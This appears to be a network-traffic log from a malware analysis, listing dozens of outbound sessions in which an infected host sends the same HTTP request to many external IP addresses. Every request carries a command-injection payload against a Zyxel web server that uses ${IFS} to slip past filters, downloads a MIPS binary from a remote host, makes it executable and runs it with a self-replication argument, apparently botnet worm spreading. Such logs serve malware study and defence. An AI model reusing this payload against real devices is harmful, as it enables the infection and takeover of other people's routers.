                                      Jan 14, 2024 15:51:01.661379099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8344192.168.2.1457572189.102.134.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666229010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8345192.168.2.1440478156.246.36.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666251898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8346192.168.2.1434434107.232.2.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666305065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8347192.168.2.143526259.128.242.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666321039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8348192.168.2.1452536109.0.13.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666372061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8349192.168.2.144365269.41.214.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666398048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8350192.168.2.143692888.71.59.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666443110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8351192.168.2.145428289.20.154.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666491985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8352192.168.2.1440970148.186.186.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666559935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8353192.168.2.1448382136.254.229.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666584969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8354192.168.2.1458084220.190.93.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666662931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8355192.168.2.143280451.154.136.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666702986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8356192.168.2.144102252.180.157.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666763067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8357192.168.2.1444808130.208.143.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666763067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8358192.168.2.144635441.78.252.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666815996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8359192.168.2.143598271.39.193.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666856050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8360192.168.2.144313299.108.78.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666883945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8361192.168.2.143536671.117.198.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666913033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8362192.168.2.145812096.182.173.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.666958094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8363192.168.2.1453322154.255.142.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667016029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8364192.168.2.1441906177.170.228.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667053938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8365192.168.2.145173090.95.110.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667104006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8366192.168.2.1441426164.127.6.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667140007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8367192.168.2.145516292.104.239.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667187929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8368192.168.2.1450768183.150.10.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667216063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8369192.168.2.144346690.11.217.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667253971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8370192.168.2.1450376219.12.207.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667300940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8371192.168.2.1440040178.22.171.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667330027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8372192.168.2.14606548.226.90.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667367935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8373192.168.2.1454966125.192.188.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667426109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8374192.168.2.1442534217.244.220.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667463064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8375192.168.2.1439004105.124.3.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667501926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8376192.168.2.143530289.185.3.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667542934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8377192.168.2.1438888132.125.193.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667587042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8378192.168.2.145731036.218.6.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667617083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8379192.168.2.1436858192.110.132.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667630911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8380192.168.2.1443128223.127.224.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667686939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8381192.168.2.1452548159.113.42.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667732000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8382192.168.2.1453426160.122.64.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667746067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8383192.168.2.1441592154.22.123.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667788982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8384192.168.2.1442122196.138.107.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667813063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8385192.168.2.1436916178.238.236.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667860985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8386192.168.2.1437960158.30.241.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667917013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8387192.168.2.145738274.214.122.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667943954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8388192.168.2.1443454138.1.9.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.667994022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8389192.168.2.1439922213.184.240.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668041945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8390192.168.2.143952280.225.249.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668071985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8391192.168.2.1452788179.248.69.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668123007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8392192.168.2.1441040181.13.211.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668144941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8393192.168.2.145501098.192.13.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668209076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8394192.168.2.143980091.139.6.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668253899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8395192.168.2.144859290.3.146.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668287039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8396192.168.2.1440282140.56.40.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668342113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8397192.168.2.1444282109.41.45.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668384075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8398192.168.2.1449676168.229.199.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668426991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8399192.168.2.1451690163.171.226.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668458939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8400192.168.2.145794476.6.249.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668525934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8401192.168.2.1450000158.42.145.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.668622017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8402192.168.2.1451096140.83.136.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.678975105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8403192.168.2.1442412209.48.133.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679068089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8404192.168.2.1439190138.203.115.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679095030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8405192.168.2.1453244152.170.140.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679128885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8406192.168.2.143964495.17.47.55443
                                      TimestampBytes transferredDirectionData
